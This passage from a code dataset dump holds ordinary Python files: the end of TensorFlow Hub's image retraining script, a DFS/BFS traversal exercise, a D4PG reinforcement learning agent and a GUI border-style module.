FLAGS.intermediate_store_frequency > 0:\n ensure_dir_exists(FLAGS.intermediate_output_graphs_dir)\n return\n\n\ndef add_jpeg_decoding(module_spec):\n \"\"\"Adds operations that perform JPEG decoding and resizing to the graph.\n\n Args:\n module_spec: The hub.ModuleSpec for the image module being used.\n\n Returns:\n Tensors for the node to feed JPEG data into, and the output of the\n preprocessing steps.\n \"\"\"\n input_height, input_width = hub.get_expected_image_size(module_spec)\n input_depth = hub.get_num_image_channels(module_spec)\n jpeg_data = tf.placeholder(tf.string, name='DecodeJPGInput')\n decoded_image = tf.image.decode_jpeg(jpeg_data, channels=input_depth)\n # Convert from full range of uint8 to range [0,1] of float32.\n decoded_image_as_float = tf.image.convert_image_dtype(decoded_image,\n tf.float32)\n decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n resize_shape = tf.stack([input_height, input_width])\n resize_shape_as_int = tf.cast(resize_shape, dtype=tf.int32)\n resized_image = tf.image.resize_bilinear(decoded_image_4d,\n resize_shape_as_int)\n return jpeg_data, resized_image\n\n\ndef export_model(module_spec, class_count, saved_model_dir):\n \"\"\"Exports model for serving.\n\n Args:\n module_spec: The hub.ModuleSpec for the image module being used.\n class_count: The number of classes.\n saved_model_dir: Directory in which to save exported model and variables.\n \"\"\"\n # The SavedModel should hold the eval graph.\n sess, in_image, _, _, _, _ = build_eval_session(module_spec, class_count)\n with sess.graph.as_default() as graph:\n tf.saved_model.simple_save(\n sess,\n saved_model_dir,\n inputs={'image': in_image},\n outputs={'prediction': graph.get_tensor_by_name('final_result:0')},\n legacy_init_op=tf.group(tf.tables_initializer(), name='legacy_init_op')\n )\n\n\ndef logging_level_verbosity(logging_verbosity):\n \"\"\"Converts logging_level into TensorFlow logging verbosity value.\n\n Args:\n logging_verbosity: String value representing logging level: 'DEBUG', 'INFO',\n 'WARN', 'ERROR', 'FATAL'\n \"\"\"\n name_to_level = {\n 'FATAL': logging.FATAL,\n 'ERROR': logging.ERROR,\n 'WARN': logging.WARN,\n 'INFO': logging.INFO,\n 'DEBUG': logging.DEBUG\n }\n\n try:\n return name_to_level[logging_verbosity]\n except Exception as e:\n raise RuntimeError('Unsupported logging verbosity (%s). Use one of %s.' 
%\n (str(e), list(name_to_level)))\n\n\ndef main(_):\n # Needed to make sure the logging output is visible.\n # See https://github.com/tensorflow/tensorflow/issues/3047\n logging_verbosity = logging_level_verbosity(FLAGS.logging_verbosity)\n logging.set_verbosity(logging_verbosity)\n\n logging.error('WARNING: This tool is deprecated in favor of '\n 'https://github.com/tensorflow/hub/tree/master/'\n 'tensorflow_hub/tools/make_image_classifier')\n\n if not FLAGS.image_dir:\n logging.error('Must set flag --image_dir.')\n return -1\n\n # Prepare necessary directories that can be used during training\n prepare_file_system()\n\n # Look at the folder structure, and create lists of all the images.\n image_lists = create_image_lists(FLAGS.image_dir, FLAGS.testing_percentage,\n FLAGS.validation_percentage)\n class_count = len(image_lists.keys())\n if class_count == 0:\n logging.error('No valid folders of images found at %s', FLAGS.image_dir)\n return -1\n if class_count == 1:\n logging.error('Only one valid folder of images found at %s '\n ' - multiple classes are needed for classification.',\n FLAGS.image_dir)\n return -1\n\n # See if the command-line flags mean we're applying any distortions.\n do_distort_images = should_distort_images(\n FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,\n FLAGS.random_brightness)\n\n # Set up the pre-trained graph.\n module_spec = hub.load_module_spec(FLAGS.tfhub_module)\n graph, bottleneck_tensor, resized_image_tensor, wants_quantization = (\n create_module_graph(module_spec))\n\n # Add the new layer that we'll be training.\n with graph.as_default():\n (train_step, cross_entropy, bottleneck_input,\n ground_truth_input, final_tensor) = add_final_retrain_ops(\n class_count, FLAGS.final_tensor_name, bottleneck_tensor,\n wants_quantization, is_training=True)\n\n with tf.Session(graph=graph) as sess:\n # Initialize all weights: for the module to their pretrained values,\n # and for the newly added retraining layer to random initial values.\n init = tf.global_variables_initializer()\n sess.run(init)\n\n # Set up the image decoding sub-graph.\n jpeg_data_tensor, decoded_image_tensor = add_jpeg_decoding(module_spec)\n\n if do_distort_images:\n # We will be applying distortions, so set up the operations we'll need.\n (distorted_jpeg_data_tensor,\n distorted_image_tensor) = add_input_distortions(\n FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,\n FLAGS.random_brightness, module_spec)\n else:\n # We'll make sure we've calculated the 'bottleneck' image summaries and\n # cached them on disk.\n cache_bottlenecks(sess, image_lists, FLAGS.image_dir,\n FLAGS.bottleneck_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor,\n bottleneck_tensor, FLAGS.tfhub_module)\n\n # Create the operations we need to evaluate the accuracy of our new layer.\n evaluation_step, _ = add_evaluation_step(final_tensor, ground_truth_input)\n\n # Merge all the summaries and write them out to the summaries_dir\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n\n validation_writer = tf.summary.FileWriter(\n FLAGS.summaries_dir + '/validation')\n\n # Create a train saver that is used to restore values into an eval graph\n # when exporting models.\n train_saver = tf.train.Saver()\n\n # Run the training for as many cycles as requested on the command line.\n for i in range(FLAGS.how_many_training_steps):\n # Get a batch of input bottleneck values, either calculated fresh every\n # time with 
distortions applied, or from the cache stored on disk.\n if do_distort_images:\n (train_bottlenecks,\n train_ground_truth) = get_random_distorted_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.image_dir, distorted_jpeg_data_tensor,\n distorted_image_tensor, resized_image_tensor, bottleneck_tensor)\n else:\n (train_bottlenecks,\n train_ground_truth, _) = get_random_cached_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor, bottleneck_tensor,\n FLAGS.tfhub_module)\n # Feed the bottlenecks and ground truth into the graph, and run a training\n # step. Capture training summaries for TensorBoard with the `merged` op.\n train_summary, _ = sess.run(\n [merged, train_step],\n feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n train_writer.add_summary(train_summary, i)\n\n # Every so often, print out how well the graph is training.\n is_last_step = (i + 1 == FLAGS.how_many_training_steps)\n if (i % FLAGS.eval_step_interval) == 0 or is_last_step:\n train_accuracy, cross_entropy_value = sess.run(\n [evaluation_step, cross_entropy],\n feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n logging.info('%s: Step %d: Train accuracy = %.1f%%',\n datetime.now(), i, train_accuracy * 100)\n logging.info('%s: Step %d: Cross entropy = %f',\n datetime.now(), i, cross_entropy_value)\n # TODO: Make this use an eval graph, to avoid quantization\n # moving averages being updated by the validation set, though in\n # practice this makes a negligable difference.\n validation_bottlenecks, validation_ground_truth, _ = (\n get_random_cached_bottlenecks(\n sess, image_lists, FLAGS.validation_batch_size, 'validation',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor, bottleneck_tensor,\n FLAGS.tfhub_module))\n # Run a validation step and capture training summaries for TensorBoard\n # with the `merged` op.\n validation_summary, validation_accuracy = sess.run(\n [merged, evaluation_step],\n feed_dict={bottleneck_input: validation_bottlenecks,\n ground_truth_input: validation_ground_truth})\n validation_writer.add_summary(validation_summary, i)\n logging.info('%s: Step %d: Validation accuracy = %.1f%% (N=%d)',\n datetime.now(), i, validation_accuracy * 100,\n len(validation_bottlenecks))\n\n # Store intermediate results\n intermediate_frequency = FLAGS.intermediate_store_frequency\n\n if (intermediate_frequency > 0 and (i % intermediate_frequency == 0)\n and i > 0):\n # If we want to do an intermediate save, save a checkpoint of the train\n # graph, to restore into the eval graph.\n train_saver.save(sess, FLAGS.checkpoint_path)\n intermediate_file_name = (FLAGS.intermediate_output_graphs_dir +\n 'intermediate_' + str(i) + '.pb')\n logging.info('Save intermediate result to : %s', intermediate_file_name)\n save_graph_to_file(intermediate_file_name, module_spec,\n class_count)\n\n # After training is complete, force one last save of the train checkpoint.\n train_saver.save(sess, FLAGS.checkpoint_path)\n\n # We've completed all our training, so run a final test evaluation on\n # some new images we haven't used before.\n run_final_eval(sess, module_spec, class_count, image_lists,\n jpeg_data_tensor, decoded_image_tensor, resized_image_tensor,\n bottleneck_tensor)\n\n # Write out the trained graph and labels with the weights stored as\n # 
constants.\n logging.info('Save final result to : %s', FLAGS.output_graph)\n if wants_quantization:\n logging.info('The model is instrumented for quantization with TF-Lite')\n save_graph_to_file(FLAGS.output_graph, module_spec, class_count)\n with tf.gfile.GFile(FLAGS.output_labels, 'w') as f:\n f.write('\\n'.join(image_lists.keys()) + '\\n')\n\n if FLAGS.saved_model_dir:\n export_model(module_spec, class_count, FLAGS.saved_model_dir)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--image_dir',\n type=str,\n default='',\n help='Path to folders of labeled images.'\n )\n parser.add_argument(\n '--output_graph',\n type=str,\n default='/tmp/output_graph.pb',\n help='Where to save the trained graph.'\n )\n parser.add_argument(\n '--intermediate_output_graphs_dir',\n type=str,\n default='/tmp/intermediate_graph/',\n help='Where to save the intermediate graphs.'\n )\n parser.add_argument(\n '--intermediate_store_frequency',\n type=int,\n default=0,\n help=\"\"\"\\\n How many steps to store intermediate graph. If \"0\" then will not\n store.\\\n \"\"\"\n )\n parser.add_argument(\n '--output_labels',\n type=str,\n default='/tmp/output_labels.txt',\n help='Where to save the trained graph\\'s labels.'\n )\n parser.add_argument(\n '--summaries_dir',\n type=str,\n default='/tmp/retrain_logs',\n help='Where to save summary logs for TensorBoard.'\n )\n parser.add_argument(\n '--how_many_training_steps',\n type=int,\n default=4000,\n help='How many training steps to run before ending.'\n )\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=0.01,\n help='How large a learning rate to use when training.'\n )\n parser.add_argument(\n '--testing_percentage',\n type=int,\n default=10,\n help='What percentage of images to use as a test set.'\n )\n parser.add_argument(\n '--validation_percentage',\n type=int,\n default=10,\n help='What percentage of images to use as a validation set.'\n )\n parser.add_argument(\n '--eval_step_interval',\n type=int,\n default=10,\n help='How often to evaluate the training results.'\n )\n parser.add_argument(\n '--train_batch_size',\n type=int,\n default=100,\n help='How many images to train on at a time.'\n )\n parser.add_argument(\n '--test_batch_size',\n type=int,\n default=-1,\n help=\"\"\"\\\n How many images to test on. This test set is only used once, to evaluate\n the final accuracy of the model after training completes.\n A value of -1 causes the entire test set to be used, which leads to more\n stable results across runs.\\\n \"\"\"\n )\n parser.add_argument(\n '--validation_batch_size',\n type=int,\n default=100,\n help=\"\"\"\\\n How many images to use in an evaluation batch. 
This validation set is\n used much more often than the test set, and is an early indicator of how\n accurate the model is during training.\n A value of -1 causes the entire validation set to be used, which leads to\n more stable results across training iterations, but may be slower on large\n training sets.\\\n \"\"\"\n )\n parser.add_argument(\n '--print_misclassified_test_images',\n default=False,\n help=\"\"\"\\\n Whether to print out a list of all misclassified test images.\\\n \"\"\",\n action='store_true'\n )\n parser.add_argument(\n '--bottleneck_dir',\n type=str,\n default='/tmp/bottleneck',\n help='Path to cache bottleneck layer values as files.'\n )\n parser.add_argument(\n '--final_tensor_name',\n type=str,\n default='final_result',\n help=\"\"\"\\\n The name of the output classification layer in the retrained graph.\\\n \"\"\"\n )\n parser.add_argument(\n '--flip_left_right',\n default=False,\n help=\"\"\"\\\n Whether to randomly flip half of the training images horizontally.\\\n \"\"\",\n action='store_true'\n )\n parser.add_argument(\n '--random_crop',\n type=int,\n default=0,\n help=\"\"\"\\\n A percentage determining how much of a margin to randomly crop off the\n training images.\\\n \"\"\"\n )\n parser.add_argument(\n '--random_scale',\n type=int,\n default=0,\n help=\"\"\"\\\n A percentage determining how much to randomly scale up the size of the\n training images by.\\\n \"\"\"\n )\n parser.add_argument(\n '--random_brightness',\n type=int,\n default=0,\n help=\"\"\"\\\n A percentage determining how much to randomly multiply the training image\n input pixels up or down by.\\\n \"\"\"\n )\n parser.add_argument(\n '--tfhub_module',\n type=str,\n default=(\n 'https://tfhub.dev/google/imagenet/inception_v3/feature_vector/3'),\n help=\"\"\"\\\n Which TensorFlow Hub module to use. 
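An illustrative invocation (the image directory path here is an assumption, not taken from this script; the module URL is this flag's default):\n\n python retrain.py --image_dir ~/my_labeled_images \\\n --tfhub_module https://tfhub.dev/google/imagenet/inception_v3/feature_vector/3\n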
For more options,\n search https://tfhub.dev for image feature vector modules.\\\n \"\"\")\n parser.add_argument(\n '--saved_model_dir',\n type=str,\n default='',\n help='Where to save the exported graph.')\n parser.add_argument(\n '--logging_verbosity',\n type=str,\n default='INFO',\n choices=['DEBUG', 'INFO', 'WARN', 'ERROR', 'FATAL'],\n help='How much logging output should be produced.')\n parser.add_argument(\n '--checkpoint_path',\n type=str,\n default='/tmp/_retrain_checkpoint',\n help='Where to save checkpoint files.'\n )\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"tensorflow/hub","sub_path":"examples/image_retraining/retrain.py","file_name":"retrain.py","file_ext":"py","file_size_in_byte":55105,"program_lang":"python","lang":"en","doc_type":"code","stars":3408,"dataset":"github-code","pt":"48"} +{"seq_id":"20111143188","text":"def dfs(c):\r\n\r\n # Register visit info\r\n v[c] = 1\r\n ans_dfs.append(c)\r\n\r\n # Next nodes to visit\r\n for i in adj[c]:\r\n if v[i] == 0:\r\n dfs(i)\r\n\r\ndef bfs(s):\r\n # Create the needed q, v[] and variables\r\n q = []\r\n\r\n # Insert initial data into the queue\r\n q.append(s)\r\n ans_bfs.append(s)\r\n v[s] = 1\r\n\r\n while q:\r\n c = q.pop(0)\r\n for n in adj[c]:\r\n if v[n] == 0:\r\n q.append(n)\r\n v[n] = 1\r\n ans_bfs.append(n)\r\n\r\n\r\n# Number of vertices N and edges M, starting vertex number V\r\nN,M,V = map( int, input().split() )\r\n# Create adjacency list\r\nadj = [[] for _ in range(N+1) ]\r\n# Fill adjacency list\r\nfor _ in range(M):\r\n s, e = map( int, input().split() )\r\n # Bidirectional\r\n adj[s].append(e)\r\n adj[e].append(s)\r\n\r\n# Sort in ascending order\r\nfor i in range( 1, N+1 ):\r\n adj[i].sort()\r\n\r\n# DFS visit info, visit record\r\nv = [0] * ( N + 1)\r\nans_dfs = []\r\ndfs(V)\r\n\r\n# BFS visit info, visit record\r\nv = [0] * ( N + 1)\r\nans_bfs = []\r\nbfs(V)\r\n\r\nprint( *ans_dfs )\r\nprint( *ans_bfs )\r\n\r\n\r\n","repo_name":"hbkuk/Algorithm","sub_path":"백준/Silver/1260. 
DFS와 BFS/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16769305227","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mpi4py import MPI\nfrom mpi_utils.mpi_utils import sync_networks, sync_grads\nfrom mpi_utils.normalizer import normalizer\nfrom torch.distributions import Categorical\nfrom l2_projection import _l2_project\n\ndevice = torch.device(\"cpu\")\n\n# Implementation of Twin Delayed Deep Deterministic Policy Gradients (TD3)\n# Paper: https://arxiv.org/abs/1802.09477\n\n\nclass Actor(nn.Module):\n\tdef __init__(self, state_dim, action_dim, max_action):\n\t\tsuper(Actor, self).__init__()\n\n\t\tself.l1 = nn.Linear(state_dim, 256)\n\t\tself.l2 = nn.Linear(256, 256)\n\t\tself.l3 = nn.Linear(256, action_dim)\n\t\t\n\t\tself.max_action = max_action\n\t\t\n\n\tdef forward(self, state):\n\t\ta = F.relu(self.l1(state))\n\t\ta = F.relu(self.l2(a))\n\t\treturn self.max_action * torch.tanh(self.l3(a))\n\n\nclass Critic(nn.Module):\n\tdef __init__(self, state_dim, action_dim,v_min,v_max,num_atoms):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tnum_states (int): state dimension\n\t\t\tnum_actions (int): action dimension\n\t\t\thidden_size (int): size of the hidden layers\n\t\t\tv_min (float): minimum value for critic\n\t\t\tv_max (float): maximum value for critic\n\t\t\tnum_atoms (int): number of atoms in distribution\n\t\t\tinit_w:\n\t\t\"\"\"\n\t\tsuper(Critic, self).__init__()\n\n\t\t# Q1 architecture\n\t\tself.l1 = nn.Linear(state_dim + action_dim, 256)\n\t\tself.l2 = nn.Linear(256, 256)\n\t\tself.l3 = nn.Linear(256, num_atoms)\n\t\t\n\t\tself.z_atoms = np.linspace(v_min, v_max, num_atoms)\n\n\n\n\tdef forward(self, state, action):\n\t\tsa = torch.cat([state, action], 1)\n\n\t\tq1 = F.relu(self.l1(sa))\n\t\tq1 = F.relu(self.l2(q1))\n\t\tq1 = self.l3(q1)\n\n\t\treturn q1\n\t\n\tdef get_probs(self, state, action):\n\t\tq1 = self.forward(state, action)\n\t\tq1 = torch.softmax(q1, dim=1)\n\t\treturn q1\n\t\n\t\n\n\nclass D4PG(object):\n\tdef __init__(\n\t\tself,\n\t\tstate_dim,\n\t\taction_dim,\n\t\tmax_action,\n\t\tdiscount=0.99,\n\t\ttau=0.005,\n\t\tpolicy_noise=0.2,\n\t\tnoise_clip=0.5,\n\t\tpolicy_freq=2,\n\t\tv_min = 0,\n\t\tv_max = 100,\n\t\tnum_atoms = 51,\n\t\t\n\t):\n\t\tself.adam_lr = 3e-4\n\t\t#distributional learning\n\t\tself.v_min = v_min\n\t\tself.v_max = v_max\n\t\tself.num_atoms = num_atoms\n\t\tself.delta_z = (self.v_max - self.v_min) / (self.num_atoms - 1)\n\t\tself.actor = Actor(state_dim, action_dim, max_action).to(device)\n\t\tsync_networks(self.actor)\n\t\tself.actor_target = copy.deepcopy(self.actor)\n\t\tself.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.adam_lr)\n\n\t\tself.critic = Critic(state_dim, action_dim, self.v_min, self.v_max, self.num_atoms).to(device)\n\t\tsync_networks(self.critic)\n\t\tself.critic_target = copy.deepcopy(self.critic)\n\t\tself.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.adam_lr)\n\t\t\n\t\t#the Binary Cross Entropy between the target and the input probabilities\n\t\tself.value_criterion = nn.BCELoss(reduction='none')\n\n\t\tself.max_action = max_action\n\t\tself.discount = discount\n\t\tself.tau = tau\n\t\tself.policy_noise = policy_noise\n\t\tself.noise_clip = noise_clip\n\t\tself.policy_freq = policy_freq\n\n\t\tself.total_it = 0\n\t\t\n\tdef select_action(self, state):\n\t\tstate = 
torch.FloatTensor(state.reshape(1, -1)).to(device)\n\t\treturn self.actor(state).cpu().data.numpy().flatten()\n\t\n\n\n\tdef train(self, replay_buffer, batch_size=256,T = 1):\n\t\tself.total_it += 1\n\t\t####Get experience\n\t\tstate, action, next_state, reward, not_done,d_gamma = replay_buffer.sample(batch_size)\n\n\t\t\n\t\t#start update\n\t\twith torch.no_grad():\n\t\t\t# Select action according to policy and add clipped noise\n\t\t\tnoise = (\n\t\t\t\ttorch.randn_like(action) * self.policy_noise\n\t\t\t).clamp(-self.noise_clip, self.noise_clip)\n\t\t\t\n\t\t\tnext_action = (\n\t\t\t\tself.actor_target(next_state) + noise\n\t\t\t).clamp(-self.max_action, self.max_action)\n\n\t\t\t# predict Z distribution with target Z network\n\t\t\ttarget_Q = self.critic_target.get_probs(next_state, next_action)\n\t\t\n\t\t\t#projected distribution\n\t\t\ttarget_Z_projected = _l2_project(next_distr_v=target_Q,\n rewards_v=reward,\n dones_mask_t=(1-not_done),\n gamma=self.discount,\n n_atoms=self.num_atoms,\n v_min=self.v_min,\n v_max=self.v_max,\n delta_z=self.delta_z)\n\t\t\t#trans to tensor\n\t\t\ttarget_Z_projected = torch.from_numpy(target_Z_projected).float().to(device)\n\t\t\t\n\t\t\t\n\t\t# Get current Q estimates\n\t\tcurrent_Q = self.critic.get_probs(state, action)\n\t\t\n\t\t# Compute critic loss\n\t\tcritic_loss = self.value_criterion(current_Q, target_Z_projected).mean(axis=1) \n\t\t\n\t\t# Optimize the critic\n\t\tcritic_loss = critic_loss.mean()\n\t\t\n\t\tself.critic_optimizer.zero_grad()\n\t\tcritic_loss.backward()\n\t\tsync_grads(self.critic)\n\t\tself.critic_optimizer.step()\n\t\t\n\t\t# Delayed policy updates\n\t\tif self.total_it % self.policy_freq == 0:\n\t\t\tactor_loss = self.critic.get_probs(state, self.actor(state))\n\t\t\tactor_loss = actor_loss*torch.from_numpy(self.critic.z_atoms).float().to(device)\n\t\t\tactor_loss = torch.sum(actor_loss,dim=1)\n\t\t\tactor_loss = -actor_loss.mean()\n\t\t\t\n\t\t\t# Optimize the actor \n\t\t\tself.actor_optimizer.zero_grad()\n\t\t\tactor_loss.backward()\n\t\t\tsync_grads(self.actor)\n\t\t\tself.actor_optimizer.step()\n\n\t\t\t# Update the frozen target models\n\t\t\tfor param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n\t\t\tfor param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n\t\t\t\n\tdef save(self, filename):\n\t\ttorch.save(self.critic.state_dict(), filename + \"_critic\")\n\t\ttorch.save(self.critic_optimizer.state_dict(), filename + \"_critic_optimizer\")\n\t\t\n\t\ttorch.save(self.actor.state_dict(), filename + \"_actor\")\n\t\ttorch.save(self.actor_optimizer.state_dict(), filename + \"_actor_optimizer\")\n\n\n\tdef load(self, filename):\n\t\tself.critic.load_state_dict(torch.load(filename + \"_critic\"))\n\t\tself.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n\t\tself.critic_target = copy.deepcopy(self.critic)\n\n\t\tself.actor.load_state_dict(torch.load(filename + \"_actor\"))\n\t\tself.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n\t\tself.actor_target = 
copy.deepcopy(self.actor)\n\t\t\n","repo_name":"JennieSi-Lab-RLOC/Long-N-Step-Surrogate-Stage-Reward-LNSS-NeurIPS23","sub_path":"LNSS_DRL/D4PG.py","file_name":"D4PG.py","file_ext":"py","file_size_in_byte":6352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11472461109","text":"__all__ = [\n \"Borderstyle\",\n \"FlatBorder\",\n \"GradientBorder\",\n \"OldshadowBorder\",\n \"MaterialBorder\",\n \"BORDERSTYLES\",\n \"norm_borderstyle\",\n \"Style\",\n \"DEFAULT_STYLE\",\n]\n\nimport collections\nimport inspect\nfrom abc import ABCMeta, abstractmethod\nfrom typing import (\n Dict,\n Type,\n TYPE_CHECKING,\n Optional,\n Union,\n Any,\n List,\n Set,\n overload,\n Callable,\n NamedTuple,\n)\n\nfrom .. import util\nfrom ..util.types import *\n\nif TYPE_CHECKING:\n from . import widgets\n\n\nclass _BorderstyleMetaclass(ABCMeta):\n def __new__(mcls, clsname, bases, attrs, name: Optional[str] = None, **kwargs):\n # if name is None:\n # raise TypeError(\n # \"Border styles require a 'name' keyword argument in the class definition\"\n # )\n mcls.name = name\n\n # attrs[\"__eq__\"] = mcls.__eq__\n # attrs[\"name\"] = name\n return super(_BorderstyleMetaclass, mcls).__new__(\n mcls, clsname, bases, attrs, **kwargs\n )\n\n def __eq__(self, other):\n if self.name is not None:\n return other == self.name or self is other\n else:\n return self is other\n\n def __hash__(self):\n return hash((self.name, self.__name__))\n\n\nclass Borderstyle(object, metaclass=_BorderstyleMetaclass):\n \"\"\"\n Base class for all border styles.\n\n Each border style class serves a single style, although some parameters may be adjustable.\n\n Currently, border style classes are not instantiated per widget, but rather rely on\n class methods. This reduces memory overhead but may be changed in the future.\n\n For backwards compatibility, border style classes themselves compare equal with their\n old-style string equivalents. 
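For example, a minimal usage sketch (``norm_borderstyle`` is defined further down in this module; both spellings resolve to the same class)::\n\n norm_borderstyle(\"gradient\") # -> GradientBorder\n norm_borderstyle(MaterialBorder) # subclasses are passed through unchanged\n\n 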
This is accomplished with a metaclass and not necessary\n to emulate for new styles and may be removed in a future version.\n \"\"\"\n\n @classmethod\n @abstractmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n \"\"\"\n Gets the color map for a button-style widget.\n\n TODO: document return format\n\n :param widget: Widget that the color map belongs to\n :type widget: BasicWidget\n :param bg: Background color this widget is placed on\n :type bg: ColorRGB\n :param o: Outer color, usually same as the background\n :type o: ColorRGB\n :param i: Inner color, usually lighter than the background\n :type i: ColorRGB\n :param s: Shadow color, usually quite a bit darker than the background\n :type s: ColorRGB\n :param h: Highlight color, usually quite a bit lighter than the background\n :type h: ColorRGB\n :param state: Optional widget state override\n :type state: str\n :return:\n :rtype:\n \"\"\"\n pass\n\n\nclass FlatBorder(Borderstyle, name=\"flat\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n cb1 = i + i + i + i\n cb2 = i + i + i + i\n cb3 = i + i + i + i\n cb4 = i + i + i + i\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nclass GradientBorder(Borderstyle, name=\"gradient\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n state = widget.getState() if state is None else state\n\n if state == \"pressed\":\n i = s\n elif state == \"hover\":\n i = [min(i[0] + 6, 255), min(i[1] + 6, 255), min(i[2] + 6, 255)]\n cb1 = i + i + o + o\n cb2 = i + o + o + i\n cb3 = o + o + i + i\n cb4 = o + i + i + o\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nclass OldshadowBorder(Borderstyle, name=\"oldshadow\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n state = widget.getState() if state is None else state\n\n if state == \"pressed\":\n i = s\n s, h = h, s\n elif state == \"hover\":\n i = [min(i[0] + 6, 255), min(i[1] + 6, 255), min(i[2] + 6, 255)]\n s = [min(s[0] + 6, 255), min(s[1] + 6, 255), min(s[2] + 6, 255)]\n cb1 = h + h + h + h\n cb2 = s + s + s + s\n cb3 = s + s + s + s\n cb4 = h + h + h + h\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nclass MaterialBorder(Borderstyle, name=\"material\"):\n @classmethod\n def get_colormap(\n cls,\n widget: \"widgets.BasicWidget\",\n bg: ColorRGB,\n o: ColorRGB,\n i: ColorRGB,\n s: ColorRGB,\n h: ColorRGB,\n state: Optional[str] = None,\n ):\n state = widget.getState() if state is None else state\n\n if state == \"pressed\":\n i = [max(bg[0] - 20, 0), max(bg[1] - 20, 0), max(bg[2] - 20, 0)]\n elif state == \"hover\":\n i = [max(bg[0] - 10, 0), max(bg[1] - 10, 0), max(bg[2] - 10, 0)]\n cb1 = s + s + o + o\n cb2 = s + o + o + s\n cb3 = o + o + s + s\n cb4 = o + s + s + o\n cc = i + i + i + i\n\n return cb1, cb2, cb3, cb4, cc\n\n\nBORDERSTYLES: Dict[str, Type[Borderstyle]] = {\n \"flat\": FlatBorder,\n \"gradient\": GradientBorder,\n \"oldshadow\": OldshadowBorder,\n \"material\": MaterialBorder,\n}\n\"\"\"\nMap of border style names to classes that implement them.\n\nSee 
the documentation of each class for descriptions.\n\"\"\"\n\n\ndef norm_borderstyle(borderstyle: Union[str, Type[Borderstyle]]) -> Type[Borderstyle]:\n \"\"\"\n Normalizes border styles to :py:class:`Borderstyle` subclasses.\n\n :param borderstyle: Value to normalize\n :type borderstyle: Either str or Borderstyle subclass\n :return: Normalized value\n :rtype: Borderstyle subclass\n :raises TypeError: if an unexpected value was given\n \"\"\"\n if isinstance(borderstyle, str):\n if borderstyle not in BORDERSTYLES:\n raise ValueError(f\"Unknown border style {borderstyle}\")\n return BORDERSTYLES[borderstyle]\n elif issubclass(borderstyle, Borderstyle):\n return borderstyle\n else:\n raise TypeError(\"Invalid border style!\")\n\n\nclass StyleWatcher(NamedTuple):\n selector: str\n callback: Union[Callable[[StyleValue], Any], Callable[[], Any]]\n\n\nclass Style(object):\n \"\"\"\n Core of the hierarchical style system.\n\n This class allows for easily inheriting styles from a parent (e.g. submenu or menu)\n while allowing dynamic overwriting at any level in the hierarchy. For example, a\n specific submenu could have a different font that would then be automatically applied\n to all widgets within it, unless the font was overridden for the widget locally.\n\n When reading a style attribute, this class first checks if it has a local override for\n that attribute. If so, it will be returned. If the attribute wasn't overridden locally,\n the parent is queried and its result returned. The root of this hierarchy is the\n :py:attr:`~peng3d.peng.Peng.style` attribute of the :py:class:`~peng3d.peng.Peng()`\n singleton, which uses the styles defined in :py:data:`DEFAULT_STYLE` as a default.\n If a style attribute is not found anywhere, a :py:exc:`KeyError` will be raised.\n\n When writing a style attribute, a local override is created. This causes all subsequent\n accesses to the style attribute within this instance and all children (e.g. widgets\n within a submenu) to read back the new value. Deleting the style attribute will reset\n this override and thus reset the read value back to the parent value.\n\n Note that changes in an attribute usually require a redraw of the affected widgets.\n If a redraw is not performed, weird graphical glitches may happen.\n\n This class is very flexible and allows several different modes of access.\n\n First, it is possible to use it like a dict, e.g. 